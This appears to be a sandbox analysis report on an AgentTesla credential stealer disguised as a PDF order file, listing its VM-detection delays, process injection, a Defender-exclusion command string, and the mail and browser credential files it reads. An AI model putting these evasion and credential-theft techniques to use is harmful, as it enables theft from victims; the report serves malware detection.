Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 235204 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 235078 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 234953 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Window / User API: threadDelayed 1168 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Window / User API: threadDelayed 2873 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Window / User API: threadDelayed 890 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Window / User API: threadDelayed 8962 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239872 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239761 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 35197 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239656 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239546 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239438 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239297 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239187 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239047 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238907 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238781 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238672 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238547 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238437 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238328 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238219 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237797 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237500 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237391 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237250 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237141 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 236954 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 236594 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 236094 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 235204 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 235078 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 234953 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: vmware
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E128A8 LdrInitializeThunk, 5_2_00E128A8
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Jump to behavior
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmp Binary or memory string: Progman
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs